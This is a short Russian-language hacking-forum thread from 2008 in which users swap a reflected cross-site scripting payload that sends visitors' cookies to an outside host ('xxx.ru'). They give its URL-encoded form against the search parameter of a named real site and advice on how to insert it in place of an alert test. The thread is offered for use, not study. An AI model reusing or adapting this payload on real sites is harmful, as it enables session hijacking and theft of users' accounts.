HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.08.2008, 23:35
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
С нами: 9930436

Репутация: 14
По умолчанию

Исходный
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
 

  #12  
Старый 04.08.2008, 23:47
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
С нами: 9862248

Репутация: 0
По умолчанию

http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

получаю нерабочий
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3E"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>%3C/script%3E
 

  #13  
Старый 04.08.2008, 23:52
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
С нами: 9930436

Репутация: 14
По умолчанию

Цитата:
Сообщение от popel  
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
заменять надо не alert('ggg'), а <script>alert('ggg')</script>
 

  #14  
Старый 05.08.2008, 01:56
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

&url=http://vital.h.com.ua ))))))))))
 
Закрытая тема



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кукисы k0lbasa Болталка 9 27.05.2008 00:46
Кукисы в phpbb, что с ними делать? =) Manoz Уязвимости CMS / форумов 11 01.01.2007 15:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.